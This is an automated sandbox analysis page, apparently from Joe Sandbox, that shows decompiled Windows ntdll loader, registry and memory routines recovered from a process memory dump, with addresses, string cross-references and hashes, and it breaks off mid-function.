                                              0x051c8927
                                              0x051c892f
                                              0x051c8933
                                              0x00000000
                                              0x051c88f5
                                              0x051c88f5
                                              0x00000000
                                              0x051c88f7
                                              0x051c88f7
                                              0x051c88fa
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x051c88fa
                                              0x051c88f5
                                              0x051c88f3
                                              0x00000000
                                              0x051c88d5
                                              0x00000000
                                              0x051c88b2
                                              0x051c88c9
                                              0x00000000
                                              0x051c88c9
                                              0x051c887f
                                              0x051c886a
                                              0x051c8857
                                              0x051c8852
                                              0x051c88bf
                                              0x051c88bf
                                              0x051c87aa
                                              0x051c87ad
                                              0x051c87ae
                                              0x051c87b4
                                              0x051c87b5
                                              0x051c87b6
                                              0x051c87b8
                                              0x051c87bd
                                              0x051c87c1
                                              0x051c87f4
                                              0x051c87fa
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x051c87c1
                                              0x00000000

                                              Strings
                                              • LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x, xrefs: 05219C18
                                              • LdrpDoPostSnapWork, xrefs: 05219C1E
                                              • minkernel\ntdll\ldrsnap.c, xrefs: 05219C28
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.625881473.0000000005190000.00000040.00000800.00020000.00000000.sdmp, Offset: 05190000, based on PE: true
                                              • Associated: 00000008.00000002.626869305.00000000052AB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 00000008.00000002.626998143.00000000052AF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_5190000_logagent.jbxd
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID: LdrpDoPostSnapWork$LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x$minkernel\ntdll\ldrsnap.c
                                              • API String ID: 2994545307-1948996284
                                              • Opcode ID: caf02d5ce0d52c98349de9341134cdee5b9a457f50635e0a6d31bea1b4f9b724
                                              • Instruction ID: 6f22f1ac8f05358e01716d280a4dbb3f7e1fc1447a1060432060781ed1d52381
                                              • Opcode Fuzzy Hash: caf02d5ce0d52c98349de9341134cdee5b9a457f50635e0a6d31bea1b4f9b724
                                              • Instruction Fuzzy Hash: 8791E572B14216BBDF18DF54C8C5ABA7BB6FFA4300F1540ADE905AB641E732A941CB90
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 051C7E41 Relevance: 3.9, Strings: 3, Instructions: 174COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 98%
                                              			E051C7E41(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				char _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				char _v24;
				signed int _t73;
				void* _t77;
				char* _t82;
				char* _t87;
				signed char* _t97;
				signed char _t102;
				intOrPtr _t107;
				signed char* _t108;
				intOrPtr _t112;
				intOrPtr _t124;
				intOrPtr _t125;
				intOrPtr _t126;

				_t107 = __edx;
				_v12 = __ecx;
				_t125 =  *((intOrPtr*)(__ecx + 0x20));
				_t124 = 0;
				_v20 = __edx;
				if(E051CCEE4( *((intOrPtr*)(_t125 + 0x18)), 1, 0xe,  &_v24,  &_v8) >= 0) {
					_t112 = _v8;
				} else {
					_t112 = 0;
					_v8 = 0;
				}
				if(_t112 != 0) {
					if(( *(_v12 + 0x10) & 0x00800000) != 0) {
						_t124 = 0xc000007b;
						goto L8;
					}
					_t73 =  *(_t125 + 0x34) | 0x00400000;
					 *(_t125 + 0x34) = _t73;
					if(( *(_t112 + 0x10) & 0x00000001) == 0) {
						goto L3;
					}
					 *(_t125 + 0x34) = _t73 | 0x01000000;
					_t124 = E051BC9A4( *((intOrPtr*)(_t125 + 0x18)));
					if(_t124 < 0) {
						goto L8;
					} else {
						goto L3;
					}
				} else {
					L3:
					if(( *(_t107 + 0x16) & 0x00002000) == 0) {
						 *(_t125 + 0x34) =  *(_t125 + 0x34) & 0xfffffffb;
						L8:
						return _t124;
					}
					if(( *( *((intOrPtr*)(_t125 + 0x5c)) + 0x10) & 0x00000080) != 0) {
						if(( *(_t107 + 0x5e) & 0x00000080) != 0) {
							goto L5;
						}
						_t102 =  *0x52a5780; // 0x0
						if((_t102 & 0x00000003) != 0) {
							E05235510("minkernel\\ntdll\\ldrmap.c", 0x363, "LdrpCompleteMapModule", 0, "Could not validate the crypto signature for DLL %wZ\n", _t125 + 0x24);
							_t102 =  *0x52a5780; // 0x0
						}
						if((_t102 & 0x00000010) != 0) {
							asm("int3");
						}
						_t124 = 0xc0000428;
						goto L8;
					}
					L5:
					if(( *(_t125 + 0x34) & 0x01000000) != 0) {
						goto L8;
					}
					_t77 = _a4 - 0x40000003;
					if(_t77 == 0 || _t77 == 0x33) {
						_v16 =  *((intOrPtr*)(_t125 + 0x18));
						if(E051D7D50() != 0) {
							_t82 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
						} else {
							_t82 = 0x7ffe0384;
						}
						_t108 = 0x7ffe0385;
						if( *_t82 != 0) {
							if(( *( *[fs:0x30] + 0x240) & 0x00000004) != 0) {
								if(E051D7D50() == 0) {
									_t97 = 0x7ffe0385;
								} else {
									_t97 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
								}
								if(( *_t97 & 0x00000020) != 0) {
									E05237016(0x1490, _v16, 0xffffffff, 0xffffffff, 0, 0);
								}
							}
						}
						if(_a4 != 0x40000003) {
							L14:
							_t126 =  *((intOrPtr*)(_t125 + 0x18));
							if(E051D7D50() != 0) {
								_t87 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
							} else {
								_t87 = 0x7ffe0384;
							}
							if( *_t87 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000004) != 0) {
								if(E051D7D50() != 0) {
									_t108 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
								}
								if(( *_t108 & 0x00000020) != 0) {
									E05237016(0x1491, _t126, 0xffffffff, 0xffffffff, 0, 0);
								}
							}
							goto L8;
						} else {
							_v16 = _t125 + 0x24;
							_t124 = E051EA1C3( *((intOrPtr*)(_t125 + 0x18)),  *((intOrPtr*)(_v12 + 0x5c)), _v20, _t125 + 0x24);
							if(_t124 < 0) {
								E051BB1E1(_t124, 0x1490, 0, _v16);
								goto L8;
							}
							goto L14;
						}
					} else {
						goto L8;
					}
				}
			}




















                                              0x051c7e4c
                                              0x051c7e50
                                              0x051c7e55
                                              0x051c7e58
                                              0x051c7e5d
                                              0x051c7e71
                                              0x051c7f33
                                              0x051c7e77
                                              0x051c7e77
                                              0x051c7e79
                                              0x051c7e79
                                              0x051c7e7e
                                              0x051c7f45
                                              0x05219848
                                              0x00000000
                                              0x05219848
                                              0x051c7f4e
                                              0x051c7f53
                                              0x051c7f5a
                                              0x00000000
                                              0x00000000
                                              0x0521985a
                                              0x05219862
                                              0x05219866
                                              0x00000000
                                              0x0521986c
                                              0x00000000
                                              0x0521986c
                                              0x051c7e84
                                              0x051c7e84
                                              0x051c7e8d
                                              0x05219871
                                              0x051c7eb8
                                              0x051c7ec0
                                              0x051c7ec0
                                              0x051c7e9a
                                              0x0521987e
                                              0x00000000
                                              0x00000000
                                              0x05219884
                                              0x0521988b
                                              0x052198a7
                                              0x052198ac
                                              0x052198b1
                                              0x052198b6
                                              0x052198b8
                                              0x052198b8
                                              0x052198b9
                                              0x00000000
                                              0x052198b9
                                              0x051c7ea0
                                              0x051c7ea7
                                              0x00000000
                                              0x00000000
                                              0x051c7eac
                                              0x051c7eb1
                                              0x051c7ec6
                                              0x051c7ed0
                                              0x052198cc
                                              0x051c7ed6
                                              0x051c7ed6
                                              0x051c7ed6
                                              0x051c7ede
                                              0x051c7ee3
                                              0x052198e3
                                              0x052198f0
                                              0x05219902
                                              0x052198f2
                                              0x052198fb
                                              0x052198fb
                                              0x05219907
                                              0x0521991d
                                              0x0521991d
                                              0x05219907
                                              0x052198e3
                                              0x051c7ef0
                                              0x051c7f14
                                              0x051c7f14
                                              0x051c7f1e
                                              0x05219946
                                              0x051c7f24
                                              0x051c7f24
                                              0x051c7f24
                                              0x051c7f2c
                                              0x0521996a
                                              0x05219975
                                              0x05219975
                                              0x0521997e
                                              0x05219993
                                              0x05219993
                                              0x0521997e
                                              0x00000000
                                              0x051c7ef2
                                              0x051c7efc
                                              0x051c7f0a
                                              0x051c7f0e
                                              0x05219933
                                              0x00000000
                                              0x05219933
                                              0x00000000
                                              0x051c7f0e
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x051c7eb1

                                              Strings
                                              • LdrpCompleteMapModule, xrefs: 05219898
                                              • minkernel\ntdll\ldrmap.c, xrefs: 052198A2
                                              • Could not validate the crypto signature for DLL %wZ, xrefs: 05219891
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.625881473.0000000005190000.00000040.00000800.00020000.00000000.sdmp, Offset: 05190000, based on PE: true
                                              • Associated: 00000008.00000002.626869305.00000000052AB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 00000008.00000002.626998143.00000000052AF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_5190000_logagent.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: Could not validate the crypto signature for DLL %wZ$LdrpCompleteMapModule$minkernel\ntdll\ldrmap.c
                                              • API String ID: 0-1676968949
                                              • Opcode ID: 26cf594c2cfa4b617e12747b1dad6c289105c34d858a1a734cc78fc732394ee2
                                              • Instruction ID: e7c2c994f3d02738e5f3c72a2ae35b83d1ef6b51804e864d7127a0d3a2fe9472
                                              • Opcode Fuzzy Hash: 26cf594c2cfa4b617e12747b1dad6c289105c34d858a1a734cc78fc732394ee2
                                              • Instruction Fuzzy Hash: 1D5111326047419BDB29CB68C884B3ABBE5FF12710F05069DE8529B7D1C7B5ED80CB64
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 051BE620 Relevance: 3.9, Strings: 3, Instructions: 165COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 93%
                                              			E051BE620(void* __ecx, short* __edx, short* _a4) {
				char _v16;
				char _v20;
				intOrPtr _v24;
				char* _v28;
				char _v32;
				char _v36;
				char _v44;
				signed int _v48;
				intOrPtr _v52;
				void* _v56;
				void* _v60;
				char _v64;
				void* _v68;
				void* _v76;
				void* _v84;
				signed int _t59;
				signed int _t74;
				signed short* _t75;
				signed int _t76;
				signed short* _t78;
				signed int _t83;
				short* _t93;
				signed short* _t94;
				short* _t96;
				void* _t97;
				signed int _t99;
				void* _t101;
				void* _t102;

				_t80 = __ecx;
				_t101 = (_t99 & 0xfffffff8) - 0x34;
				_t96 = __edx;
				_v44 = __edx;
				_t78 = 0;
				_v56 = 0;
				if(__ecx == 0 || __edx == 0) {
					L28:
					_t97 = 0xc000000d;
				} else {
					_t93 = _a4;
					if(_t93 == 0) {
						goto L28;
					}
					_t78 = E051BF358(__ecx, 0xac);
					if(_t78 == 0) {
						_t97 = 0xc0000017;
						L6:
						if(_v56 != 0) {
							_push(_v56);
							E051F95D0();
						}
						if(_t78 != 0) {
							L051D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t78);
						}
						return _t97;
					}
					E051FFA60(_t78, 0, 0x158);
					_v48 = _v48 & 0x00000000;
					_t102 = _t101 + 0xc;
					 *_t96 = 0;
					 *_t93 = 0;
					E051FBB40(_t80,  &_v36, L"\\Registry\\Machine\\System\\CurrentControlSet\\Control\\NLS\\Language");
					_v36 = 0x18;
					_v28 =  &_v44;
					_v64 = 0;
					_push( &_v36);
					_push(0x20019);
					_v32 = 0;
					_push( &_v64);
					_v24 = 0x40;
					_v20 = 0;
					_v16 = 0;
					_t97 = E051F9600();
					if(_t97 < 0) {
						goto L6;
					}
					E051FBB40(0,  &_v36, L"InstallLanguageFallback");
					_push(0);
					_v48 = 4;
					_t97 = L051BF018(_v64,  &_v44,  &_v56, _t78,  &_v48);
					if(_t97 >= 0) {
						if(_v52 != 1) {
							L17:
							_t97 = 0xc0000001;
							goto L6;
						}
						_t59 =  *_t78 & 0x0000ffff;
						_t94 = _t78;
						_t83 = _t59;
						if(_t59 == 0) {
							L19:
							if(_t83 == 0) {
								L23:
								E051FBB40(_t83, _t102 + 0x24, _t78);
								if(L051C43C0( &_v48,  &_v64) == 0) {
									goto L17;
								}
								_t84 = _v48;
								 *_v48 = _v56;
								if( *_t94 != 0) {
									E051FBB40(_t84, _t102 + 0x24, _t94);
									if(L051C43C0( &_v48,  &_v64) != 0) {
										 *_a4 = _v56;
									} else {
										_t97 = 0xc0000001;
										 *_v48 = 0;
									}
								}
								goto L6;
							}
							_t83 = _t83 & 0x0000ffff;
							while(_t83 == 0x20) {
								_t94 =  &(_t94[1]);
								_t74 =  *_t94 & 0x0000ffff;
								_t83 = _t74;
								if(_t74 != 0) {
									continue;
								}
								goto L23;
							}
							goto L23;
						} else {
							goto L14;
						}
						while(1) {
							L14:
							_t27 =  &(_t94[1]); // 0x2
							_t75 = _t27;
							if(_t83 == 0x2c) {
								break;
							}
							_t94 = _t75;
							_t76 =  *_t94 & 0x0000ffff;
							_t83 = _t76;
							if(_t76 != 0) {
								continue;
							}
							goto L23;
						}
						 *_t94 = 0;
						_t94 = _t75;
						_t83 =  *_t75 & 0x0000ffff;
						goto L19;
					}
				}
			}































                                              0x051be620
                                              0x051be628
                                              0x051be62f
                                              0x051be631
                                              0x051be635
                                              0x051be637
                                              0x051be63e
                                              0x05215503
                                              0x05215503
                                              0x051be64c
                                              0x051be64c
                                              0x051be651
                                              0x00000000
                                              0x00000000
                                              0x051be661
                                              0x051be665
                                              0x0521542a
                                              0x051be715
                                              0x051be71a
                                              0x051be71c
                                              0x051be720
                                              0x051be720
                                              0x051be727
                                              0x051be736
                                              0x051be736
                                              0x051be743
                                              0x051be743
                                              0x051be673
                                              0x051be678
                                              0x051be67d
                                              0x051be682
                                              0x051be685
                                              0x051be692
                                              0x051be69b
                                              0x051be6a3
                                              0x051be6ad
                                              0x051be6b1
                                              0x051be6b2
                                              0x051be6bb
                                              0x051be6bf
                                              0x051be6c0
                                              0x051be6c8
                                              0x051be6cc
                                              0x051be6d5
                                              0x051be6d9
                                              0x00000000
                                              0x00000000
                                              0x051be6e5
                                              0x051be6ea
                                              0x051be6f9
                                              0x051be70b
                                              0x051be70f
                                              0x05215439
                                              0x0521545e
                                              0x0521545e
                                              0x00000000
                                              0x0521545e
                                              0x0521543b
                                              0x0521543e
                                              0x05215440
                                              0x05215445
                                              0x05215472
                                              0x05215475
                                              0x0521548d
                                              0x05215493
                                              0x052154a9
                                              0x00000000
                                              0x00000000
                                              0x052154ab
                                              0x052154b4
                                              0x052154bc
                                              0x052154c8
                                              0x052154de
                                              0x052154fb
                                              0x052154e0
                                              0x052154e6
                                              0x052154eb
                                              0x052154eb
                                              0x052154de
                                              0x00000000
                                              0x052154bc
                                              0x05215477
                                              0x0521547a
                                              0x05215480
                                              0x05215483
                                              0x05215486
                                              0x0521548b
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x0521548b
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x05215447
                                              0x05215447
                                              0x05215447
                                              0x05215447
                                              0x0521544e
                                              0x00000000
                                              0x00000000
                                              0x05215450
                                              0x05215452
                                              0x05215455
                                              0x0521545a
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x0521545c
                                              0x0521546a
                                              0x0521546d
                                              0x0521546f
                                              0x00000000
                                              0x0521546f
                                              0x051be70f

                                              Strings
                                              • @, xrefs: 051BE6C0
                                              • InstallLanguageFallback, xrefs: 051BE6DB
                                              • \Registry\Machine\System\CurrentControlSet\Control\NLS\Language, xrefs: 051BE68C
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.625881473.0000000005190000.00000040.00000800.00020000.00000000.sdmp, Offset: 05190000, based on PE: true
                                              • Associated: 00000008.00000002.626869305.00000000052AB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 00000008.00000002.626998143.00000000052AF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_5190000_logagent.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: @$InstallLanguageFallback$\Registry\Machine\System\CurrentControlSet\Control\NLS\Language
                                              • API String ID: 0-1757540487
                                              • Opcode ID: 6adb3f73dd951f4379f56b1f1b53b34d651abdd2ad66f95e6d8300803802eec9
                                              • Instruction ID: a1f22a325a1b792dc2698bbd25d78e889d5360a9d697d28b8faaf0a3b501a4d9
                                              • Opcode Fuzzy Hash: 6adb3f73dd951f4379f56b1f1b53b34d651abdd2ad66f95e6d8300803802eec9
                                              • Instruction Fuzzy Hash: 5A5103726183029BD714DF24C444BBBB3E9BF98614F01096EF989D7200F774D904CBA6
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 0527E539 Relevance: 2.8, Strings: 2, Instructions: 261COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 60%
                                              			E0527E539(unsigned int* __ecx, intOrPtr __edx, signed int _a4, signed int _a8) {
				signed int _v20;
				char _v24;
				signed int _v40;
				char _v44;
				intOrPtr _v48;
				signed int _v52;
				unsigned int _v56;
				char _v60;
				signed int _v64;
				char _v68;
				signed int _v72;
				void* __ebx;
				void* __edi;
				char _t87;
				signed int _t90;
				signed int _t94;
				signed int _t100;
				intOrPtr* _t113;
				signed int _t122;
				void* _t132;
				void* _t135;
				signed int _t139;
				signed int* _t141;
				signed int _t146;
				signed int _t147;
				void* _t153;
				signed int _t155;
				signed int _t159;
				char _t166;
				void* _t172;
				void* _t176;
				signed int _t177;
				intOrPtr* _t179;

				_t179 = __ecx;
				_v48 = __edx;
				_v68 = 0;
				_v72 = 0;
				_push(__ecx[1]);
				_push( *__ecx);
				_push(0);
				_t153 = 0x14;
				_t135 = _t153;
				_t132 = E0527BBBB(_t135, _t153);
				if(_t132 == 0) {
					_t166 = _v68;
					goto L43;
				} else {
					_t155 = 0;
					_v52 = 0;
					asm("stosd");
					asm("stosd");
					asm("stosd");
					asm("stosd");
					asm("stosd");
					_v56 = __ecx[1];
					if( *__ecx >> 8 < 2) {
						_t155 = 1;
						_v52 = 1;
					}
					_t139 = _a4;
					_t87 = (_t155 << 0xc) + _t139;
					_v60 = _t87;
					if(_t87 < _t139) {
						L11:
						_t166 = _v68;
						L12:
						if(_t132 != 0) {
							E0527BCD2(_t132,  *_t179,  *((intOrPtr*)(_t179 + 4)));
						}
						L43:
						if(_v72 != 0) {
							_push( *((intOrPtr*)(_t179 + 4)));
							_push( *_t179);
							_push(0x8000);
							E0527AFDE( &_v72,  &_v60);
						}
						L46:
						return _t166;
					}
					_t90 =  *(_t179 + 0xc) & 0x40000000;
					asm("sbb edi, edi");
					_t172 = ( ~_t90 & 0x0000003c) + 4;
					if(_t90 != 0) {
						_push(0);
						_push(0x14);
						_push( &_v44);
						_push(3);
						_push(_t179);
						_push(0xffffffff);
						if(E051F9730() < 0 || (_v40 & 0x00000060) == 0 || _v44 != _t179) {
							_push(_t139);
							E0527A80D(_t179, 1, _v40, 0);
							_t172 = 4;
						}
					}
					_t141 =  &_v72;
					if(E0527A854(_t141,  &_v60, 0, 0x2000, _t172, _t179,  *_t179,  *((intOrPtr*)(_t179 + 4))) >= 0) {
						_v64 = _a4;
						_t94 =  *(_t179 + 0xc) & 0x40000000;
						asm("sbb edi, edi");
						_t176 = ( ~_t94 & 0x0000003c) + 4;
						if(_t94 != 0) {
							_push(0);
							_push(0x14);
							_push( &_v24);
							_push(3);
							_push(_t179);
							_push(0xffffffff);
							if(E051F9730() < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t179) {
								_push(_t141);
								E0527A80D(_t179, 1, _v20, 0);
								_t176 = 4;
							}
						}
						if(E0527A854( &_v72,  &_v64, 0, 0x1000, _t176, 0,  *_t179,  *((intOrPtr*)(_t179 + 4))) < 0) {
							goto L11;
						} else {
							_t177 = _v64;
							 *((intOrPtr*)(_t132 + 0xc)) = _v72;
							_t100 = _v52 + _v52;
							_t146 =  *(_t132 + 0x10) & 0x00000ffd | _t177 & 0xfffff000 | _t100;
							 *(_t132 + 0x10) = _t146;
							asm("bsf eax, [esp+0x18]");
							_v52 = _t100;
							 *(_t132 + 0x10) = (_t100 << 0x00000002 ^ _t146) & 0x000000fc ^ _t146;
							 *((short*)(_t132 + 0xc)) = _t177 - _v48;
							_t47 =  &_a8;
							 *_t47 = _a8 & 0x00000001;
							if( *_t47 == 0) {
								E051D2280(_t179 + 0x30, _t179 + 0x30);
							}
							_t147 =  *(_t179 + 0x34);
							_t159 =  *(_t179 + 0x38) & 1;
							_v68 = 0;
							if(_t147 == 0) {
								L35:
								E051CB090(_t179 + 0x34, _t147, _v68, _t132);
								if(_a8 == 0) {
									E051CFFB0(_t132, _t177, _t179 + 0x30);
								}
								asm("lock xadd [eax], ecx");
								asm("lock xadd [eax], edx");
								_t132 = 0;
								_v72 = _v72 & 0;
								_v68 = _v72;
								if(E051D7D50() == 0) {
									_t113 = 0x7ffe0388;
								} else {
									_t177 = _v64;
									_t113 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
								}
								if( *_t113 == _t132) {
									_t166 = _v68;
									goto L46;
								} else {
									_t166 = _v68;
									E0526FEC0(_t132, _t179, _t166, _t177 + 0x1000);
									goto L12;
								}
							} else {
								L23:
								while(1) {
									if(_v72 < ( *(_t147 + 0xc) & 0xffff0000)) {
										_t122 =  *_t147;
										if(_t159 == 0) {
											L32:
											if(_t122 == 0) {
												L34:
												_v68 = 0;
												goto L35;
											}
											L33:
											_t147 = _t122;
											continue;
										}
										if(_t122 == 0) {
											goto L34;
										}
										_t122 = _t122 ^ _t147;
										goto L32;
									}
									_t122 =  *(_t147 + 4);
									if(_t159 == 0) {
										L27:
										if(_t122 != 0) {
											goto L33;
										}
										L28:
										_v68 = 1;
										goto L35;
									}
									if(_t122 == 0) {
										goto L28;
									}
									_t122 = _t122 ^ _t147;
									goto L27;
								}
							}
						}
					}
					_v72 = _v72 & 0x00000000;
					goto L11;
				}
			}




































                                              0x0527e547
                                              0x0527e549
                                              0x0527e54f
                                              0x0527e553
                                              0x0527e557
                                              0x0527e55a
                                              0x0527e55c
                                              0x0527e55f
                                              0x0527e561
                                              0x0527e567
                                              0x0527e56b
                                              0x0527e7e2
                                              0x00000000
                                              0x0527e571
                                              0x0527e575
                                              0x0527e577
                                              0x0527e57b
                                              0x0527e57c
                                              0x0527e57d
                                              0x0527e57e
                                              0x0527e57f
                                              0x0527e588
                                              0x0527e58f
                                              0x0527e591
                                              0x0527e592
                                              0x0527e592
                                              0x0527e596
                                              0x0527e59e
                                              0x0527e5a0
                                              0x0527e5a6
                                              0x0527e61d
                                              0x0527e61d
                                              0x0527e621
                                              0x0527e623
                                              0x0527e630
                                              0x0527e630
                                              0x0527e7e6
                                              0x0527e7eb
                                              0x0527e7ed
                                              0x0527e7f4
                                              0x0527e7fa
                                              0x0527e7ff
                                              0x0527e7ff
                                              0x0527e80a
                                              0x0527e812
                                              0x0527e812
                                              0x0527e5ab
                                              0x0527e5b4
                                              0x0527e5b9
                                              0x0527e5be
                                              0x0527e5c0
                                              0x0527e5c2
                                              0x0527e5c8
                                              0x0527e5c9
                                              0x0527e5cb
                                              0x0527e5cc
                                              0x0527e5d5
                                              0x0527e5e4
                                              0x0527e5f1
                                              0x0527e5f8
                                              0x0527e5f8
                                              0x0527e5d5
                                              0x0527e602
                                              0x0527e616
                                              0x0527e63d
                                              0x0527e644
                                              0x0527e64d
                                              0x0527e652
                                              0x0527e657
                                              0x0527e659
                                              0x0527e65b
                                              0x0527e661
                                              0x0527e662
                                              0x0527e664
                                              0x0527e665
                                              0x0527e66e
                                              0x0527e67d
                                              0x0527e68a
                                              0x0527e691
                                              0x0527e691
                                              0x0527e66e
                                              0x0527e6b0
                                              0x00000000
                                              0x0527e6b6
                                              0x0527e6bd
                                              0x0527e6c7
                                              0x0527e6d7
                                              0x0527e6d9
                                              0x0527e6db
                                              0x0527e6de
                                              0x0527e6e3
                                              0x0527e6f3
                                              0x0527e6fc
                                              0x0527e700
                                              0x0527e700
                                              0x0527e704
                                              0x0527e70a
                                              0x0527e70a
                                              0x0527e713
                                              0x0527e716
                                              0x0527e719
                                              0x0527e720
                                              0x0527e761
                                              0x0527e76b
                                              0x0527e774
                                              0x0527e77a
                                              0x0527e77a
                                              0x0527e78a
                                              0x0527e791
                                              0x0527e799
                                              0x0527e79b
                                              0x0527e79f
                                              0x0527e7aa
                                              0x0527e7c0
                                              0x0527e7ac
                                              0x0527e7b2
                                              0x0527e7b9
                                              0x0527e7b9
                                              0x0527e7c7
                                              0x0527e806
                                              0x00000000
                                              0x0527e7c9
                                              0x0527e7d1
                                              0x0527e7d8
                                              0x00000000
                                              0x0527e7d8
                                              0x00000000
                                              0x00000000
                                              0x0527e722
                                              0x0527e72e
                                              0x0527e748
                                              0x0527e74c
                                              0x0527e754
                                              0x0527e756
                                              0x0527e75c
                                              0x0527e75c
                                              0x00000000
                                              0x0527e75c
                                              0x0527e758
                                              0x0527e758
                                              0x00000000
                                              0x0527e758
                                              0x0527e750
                                              0x00000000
                                              0x00000000
                                              0x0527e752
                                              0x00000000
                                              0x0527e752
                                              0x0527e730
                                              0x0527e735
                                              0x0527e73d
                                              0x0527e73f
                                              0x00000000
                                              0x00000000
                                              0x0527e741
                                              0x0527e741
                                              0x00000000
                                              0x0527e741
                                              0x0527e739
                                              0x00000000
                                              0x00000000
                                              0x0527e73b
                                              0x00000000
                                              0x0527e73b
                                              0x0527e722
                                              0x0527e720
                                              0x0527e6b0
                                              0x0527e618
                                              0x00000000
                                              0x0527e618

                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.625881473.0000000005190000.00000040.00000800.00020000.00000000.sdmp, Offset: 05190000, based on PE: true
                                              • Associated: 00000008.00000002.626869305.00000000052AB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 00000008.00000002.626998143.00000000052AF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_5190000_logagent.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: `$`
                                              • API String ID: 0-197956300
                                              • Opcode ID: 05a91a0fb7c852bb70cf50c65af3218cd2861133de0ca7c3fb946f23ed8e9edd
                                              • Instruction ID: e289554c87b854928e9b1faa77b3000330476f5c194bb4cfe9b3274711c8a4c0
                                              • Opcode Fuzzy Hash: 05a91a0fb7c852bb70cf50c65af3218cd2861133de0ca7c3fb946f23ed8e9edd
                                              • Instruction Fuzzy Hash: 5D918F3161834A9BE724CF35C845B1BB7EABF84714F1589ADF59ACA280E774E804CB61
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 052351BE Relevance: 2.7, Strings: 2, Instructions: 173COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 77%
                                              			E052351BE(void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				signed short* _t63;
				signed int _t64;
				signed int _t65;
				signed int _t67;
				intOrPtr _t74;
				intOrPtr _t84;
				intOrPtr _t88;
				intOrPtr _t94;
				void* _t100;
				void* _t103;
				intOrPtr _t105;
				signed int _t106;
				short* _t108;
				signed int _t110;
				signed int _t113;
				signed int* _t115;
				signed short* _t117;
				void* _t118;
				void* _t119;

				_push(0x80);
				_push(0x52905f0);
				E0520D0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t118 - 0x80)) = __edx;
				_t115 =  *(_t118 + 0xc);
				 *(_t118 - 0x7c) = _t115;
				 *((char*)(_t118 - 0x65)) = 0;
				 *((intOrPtr*)(_t118 - 0x64)) = 0;
				_t113 = 0;
				 *((intOrPtr*)(_t118 - 0x6c)) = 0;
				 *((intOrPtr*)(_t118 - 4)) = 0;
				_t100 = __ecx;
				if(_t100 == 0) {
					 *(_t118 - 0x90) =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x24;
					E051CEEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
					 *((char*)(_t118 - 0x65)) = 1;
					_t63 =  *(_t118 - 0x90);
					_t101 = _t63[2];
					_t64 =  *_t63 & 0x0000ffff;
					_t113 =  *((intOrPtr*)(_t118 - 0x6c));
					L20:
					_t65 = _t64 >> 1;
					L21:
					_t108 =  *((intOrPtr*)(_t118 - 0x80));
					if(_t108 == 0) {
						L27:
						 *_t115 = _t65 + 1;
						_t67 = 0xc0000023;
						L28:
						 *((intOrPtr*)(_t118 - 0x64)) = _t67;
						L29:
						 *((intOrPtr*)(_t118 - 4)) = 0xfffffffe;
						E052353CA(0);
						return E0520D130(0, _t113, _t115);
					}
					if(_t65 >=  *((intOrPtr*)(_t118 + 8))) {
						if(_t108 != 0 &&  *((intOrPtr*)(_t118 + 8)) >= 1) {
							 *_t108 = 0;
						}
						goto L27;
					}
					 *_t115 = _t65;
					_t115 = _t65 + _t65;
					E051FF3E0(_t108, _t101, _t115);
					 *((short*)(_t115 +  *((intOrPtr*)(_t118 - 0x80)))) = 0;
					_t67 = 0;
					goto L28;
				}
				_t103 = _t100 - 1;
				if(_t103 == 0) {
					_t117 =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x38;
					_t74 = E051D3690(1, _t117, 0x5191810, _t118 - 0x74);
					 *((intOrPtr*)(_t118 - 0x64)) = _t74;
					_t101 = _t117[2];
					_t113 =  *((intOrPtr*)(_t118 - 0x6c));
					if(_t74 < 0) {
